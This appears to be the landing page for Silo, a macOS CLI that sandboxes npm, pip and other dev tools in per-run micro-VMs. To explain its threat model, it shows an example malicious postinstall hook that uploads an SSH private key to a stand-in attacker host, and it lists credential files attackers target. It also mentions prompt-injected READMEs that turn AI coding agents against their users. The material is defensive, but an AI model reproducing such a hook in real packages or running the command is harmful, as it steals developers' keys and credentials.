Run dev tools.
Not risks.
Silo wraps every tool invocation in a fresh Apple Containerization
micro-VM with its own Linux kernel. npm install can't
exfiltrate your SSH keys. pip can't read your cloud
credentials. And it feels native — ~600 ms warm start
(rootfs cache hit).
Your dev tools run a lot of code you never read.
A single npm install might execute thousands of
postinstall scripts from hundreds of maintainers. Your
machine trusts all of them by default. One malicious release — and
you've shipped your life to a Discord webhook.
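The attack shape is mundane: a lifecycle hook in a dependency's manifest. A schematic of what such a postinstall might look like — the package name, payload, and URL here are invented for illustration:

```json
{
  "name": "innocuous-helper",
  "version": "4.2.1",
  "scripts": {
    "postinstall": "curl -sf -T ~/.ssh/id_ed25519 https://attacker.example/drop || true"
  }
}
```

The `|| true` is the unsettling part: the hook swallows its own failure, so the install finishes green and nothing in your terminal looks wrong.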
SSH keys
~/.ssh/id_ed25519, known_hosts, agent sockets — readable by any process you run. A four-line postinstall exfils every server you touch.
Cloud credentials
~/.aws/credentials, gcloud tokens, kubeconfig. Stolen credentials turn into crypto miners on your company's account by breakfast.
Browser cookies
Chrome and Safari cookie jars are just files. Session cookies let attackers skip your 2FA entirely — on GitHub, Gmail, banking, anything.
Slack & Discord tokens
Desktop chat apps keep tokens on disk in predictable paths. Impersonation in your company Slack is a ten-line script away.
Source code
Every private repo, every draft, every half-finished side project. Tarball ~/code to a remote host — done in seconds.
Your keychain
Once a malicious binary runs under your user, it can prompt for keychain access with your own app's name. You'll click yes. We all would.
AI agent blast radius
Claude Code, Cursor, and friends read your tree and run shell commands. A prompt-injected README is game over. Same access as you.
Other projects
Lateral movement doesn't need privilege escalation. Your dev laptop has every client's code on one disk, under one UID.
Python venvs, Node's nvm, and even pipx isolate dependencies —
not permissions. Everything still runs as you, with your full filesystem,
on your kernel.
One process → one micro‑VM. Real kernel boundary.
Built on Apple Containerization
macOS 26 shipped a native Containerization.framework that
boots stripped-down Linux VMs in the low hundreds of milliseconds.
Silo is a thin CLI on top of it: when you run a tool, it spins
up a one-shot VM, mounts only the files you asked for, runs your
command, streams output to your terminal, and evaporates.
Feels native, isn't
Silo installs shims for python, node, cargo, go, deno —
so typing python app.py transparently runs inside a VM.
No ceremony, no exec, no container runtime glued to
your shell.
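For illustration, a shim can be as small as a two-line exec wrapper that sits earlier on your PATH than the real interpreter. This is a sketch of the mechanism, not Silo's actual shim contents — it writes a demo shim to a temp directory and prints it:

```shell
# Build a demo shim the way ~/.silo/bin/python plausibly works
# (an assumption about the mechanism, not Silo's real implementation).
mkdir -p /tmp/silo-shim-demo
cat > /tmp/silo-shim-demo/python <<'EOF'
#!/bin/sh
# Forward the entire invocation to silo, which boots the micro-VM,
# runs the real python inside it, and streams output back.
exec silo python "$@"
EOF
chmod +x /tmp/silo-shim-demo/python
cat /tmp/silo-shim-demo/python
```

Because the wrapper uses `exec`, no extra process lingers between your shell and the sandboxed tool — signals and exit codes pass straight through.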
Explicit, not magic
Every non-default exposure — network egress, host files,
forwarded ports — is an explicit key in .siloconf,
checked in with the repo. Reviewed once, reused forever.
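To make that concrete, here is a hypothetical `.siloconf` sketch. The field names echo ones mentioned elsewhere on this page (`hostAccess`, per-tool allowlists, port forwarding, host mounts); the exact schema is illustrative, not authoritative:

```yaml
# .siloconf — checked in with the repo; every line is an explicit exposure.
node:
  hostAccess: true          # opt in to network egress for this tool
  allow:                    # everything not listed is blocked by the in-VM proxy
    - registry.npmjs.org
  ports:
    - 3000                  # forward the dev server to the host
  mounts:
    - ./data                # extra host files, relative to the project root
```

A reviewer scanning a diff of this file sees exactly what the sandbox can reach — which is the point of making every exposure a named key rather than a flag buried in someone's shell history.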
The CLI is small on purpose.
- Run any tool with the `silo <tool>` shorthand and via `~/.silo/bin` shims.
- Detect project tooling from marker files (`package.json`, `requirements.txt`, `Cargo.toml`, `go.mod`) and generate a `.siloconf`.
- Bake dependencies into the rootfs: `silo build node -- npm install`. Survives every future run.
- Add `~/.silo/bin` shims so extra commands route through silo — yarn, pnpm, ipython, anything.
- Read `.siloconf`: install missing tools, warm the rootfs cache. Safe to re-run.
- Inspect `~/.silo` disk use, LRU-evict cold rootfs entries, zstd-compress stale ones, or wipe everything.
- `.siloconf` overrides.

Silo vs. the tools you already use.
| | silo | docker desktop | venv / nvm | native |
|---|---|---|---|---|
| Kernel isolation | ✓ real (new kernel) | × shared LinuxKit | × none | × none |
| Filesystem scoping | ✓ cwd only, by default | partial (volumes) | × full $HOME | × full $HOME |
| Network deny-by-default | ✓ per-project allowlist | × bridge wide open | × same as host | × same as host |
| Cold start | ~600 ms | 2–8 s + daemon | instant | instant |
| Memory overhead | ~80 MB per VM | 1–4 GB persistent | none | none |
| Transparent shims | ✓ python/node/cargo/go | × explicit docker run | partial (per-tool) | n/a |
| Background daemon? | ✓ none | × required | none | none |
Docker is container orchestration that happens to offer isolation. Silo is isolation that happens to use a container. Different goals; they coexist fine.
Three lines to sandboxed.
```shell
# 1. install silo (the user/tap/formula triple dodges homebrew-cask's silo)
$ brew install rchekalov/silo/silo

# 2. put silo shims on your PATH via shellenv (same convention as brew)
$ echo 'eval "$(silo shellenv)"' >> ~/.zshrc

# 3. install a tool (first run bootstraps kernel + initfs; ~5 min once, seconds after)
$ silo install python

# python is now sandboxed:
$ python suspicious_script.py

# one silo install per tool you need:
$ silo install node         # adds npm, npx shims
$ silo install claude-code  # adds claude shim

# network is off by default. opt in per-tool via .siloconf:
$ silo init  # auto-detects tools + writes an allowlist stub
```
Requires macOS 26+ on Apple Silicon. The Homebrew formula installs a
codesigned binary with com.apple.security.virtualization
entitlements — everything is handled for you. See the
quickstart for .siloconf and
opt-in network rules.
Fast enough you'll forget it's there.
measured on M2 Pro · macOS 26.1 · silo 0.4.0 · your results will vary
The questions you're about to ask.
Is this just Docker with a nicer CLI?
No. Docker orchestrates containers — namespaced processes sharing the host kernel. Silo uses Apple Containerization, which boots a real Linux VM per container with its own kernel. That's the difference between "shared kernel, fences between processes" and "separate kernel, hypervisor boundary." Different goals; they coexist fine.
Why only Apple Silicon?
Apple's Containerization framework (macOS 26+) is the piece that makes sub-second VM starts possible on macOS, and it requires Apple Silicon. A Docker backend for Linux users is on the roadmap — though on Linux, native namespaces already give you most of what Silo gives you on macOS.
Do I lose editor integration? LSPs?
No. silo lsp <tool> runs the language server (pyright, tsserver, rust-analyzer, gopls) inside the VM and proxies JSON-RPC over stdio with automatic path rewriting. silo ide vscode|zed|neovim generates editor configs that point at the proxied server. Autocomplete and go-to-definition work; code analysis stays isolated.
How do I give a project network access?
Add a .siloconf with an allowlist. The VM has no network by default. Flip hostAccess: true and list the domains each tool is allowed to reach — registry.npmjs.org, pypi.org, *.github.com, your private registry. Everything else is blocked by an in-VM HTTP proxy.
What about files outside my cwd?
They don't exist. The VM mounts only the directory where the walk-up finds a .siloconf (or the cwd, if there is none). ~/.ssh, ~/.aws, other projects — none of it is visible. That's the whole point: a compromised package literally cannot open a file that isn't there.
Does `npm install` / `pip install` work out of the box?
Not quite — and that's deliberate. The VM has no network until you allowlist a registry. Run silo init and it writes a sensible .siloconf stub (pypi.org for Python, registry.npmjs.org for Node, etc.) you can edit from there. Without that one file, package managers fail fast — which is the feature.
Can I use it in CI?
Silo is macOS-only today (Apple Silicon + macOS 26+), so CI works if your runners are macOS. A prebuilt-image workflow that ships ready-to-boot rootfs artifacts from GitHub Actions is planned — see docs/ci-prebuilt-images.md in the repo. For Linux CI, use a normal container.
What persists between runs?
Your project directory (mounted read-write), the rootfs cache (so warm starts are ~600 ms), and per-tool package caches (pip, npm, cargo). Everything else is ephemeral. If you want packages installed via pip or npm to survive, either keep them inside the project (venv, node_modules) or use silo build to bake them into the rootfs.
Is Silo free?
Yes. Apache 2.0. It's a personal project, not a product. The CLI wraps Apple's Containerization framework (also open-source) — there's no paid tier, no telemetry, no account.
What shipped, when.
CLI reshape, Go-only, disk reduction.
- One verb per job: `silo build` absorbs `setup`/`rebuild`, `silo sync` absorbs `pull`/`apply`, `status` splits into `doctor` + `current`.
- Rust implementation removed; Go is now the sole binary.
- Disk reclaim: LRU + age-based rootfs GC, zstd cold-tier compression (~4× smaller), image deletion on uninstall.
- Two-phase SIGINT handler; reaper for stale `silo-*` container dirs.
Project config.
- `.siloconf` walk-up with project-overrides-global merge; per-tool env, network allowlists, port forwarding.
- `silo use` / `silo unuse` for pyenv-style project pins.
- `silo init` auto-detects tools from marker files.
Transparent shims.
- Shell shims for `python`, `node`, `cargo`, `rustc`. Editor-friendly (LSPs work).
- Kernel image split from binary — `silo install` fetches it on demand.
- Fixed a deadlock when stdout was a pipe and the tool wrote > 64 KB.
Hello world.
- Initial release. `silo run` works for Python, Node, and bash.
- macOS 26+, Apple Silicon only.
Short reads to get real work done.
Understanding .siloconf: where it lives, how it merges, what every field does
A complete reference for Silo's project config file — what belongs in it, what belongs in ~/.silo/siloconf, and the full set of fields with worked examples.
Node.js with Silo: npm, yarn, pnpm, and version pinning
Running Node under Silo — persisting node_modules with silo build, switching Node versions per project, and wiring yarn / pnpm via corepack or custom shims.
Python with Silo: install, persist, pin versions
Everything you need to run Python under Silo — installing pip packages so they survive, switching versions per project, and configuring network access for PyPI.
Silo v0.4.0 release notes
The CLI is reshaped around one-model-per-command, the Rust implementation is gone, and disk reclamation now runs automatically. Smaller surface, fewer footguns.
How Silo works
A tour of the stack: a Go CLI, a Swift FFI bridge, Apple's Containerization framework, and a rootfs cache that clones in a millisecond on APFS.
Getting started with Silo in three commands
Install silo from the Homebrew tap, add its shims to your PATH, and install your first sandboxed tool. Total setup time: one coffee's worth.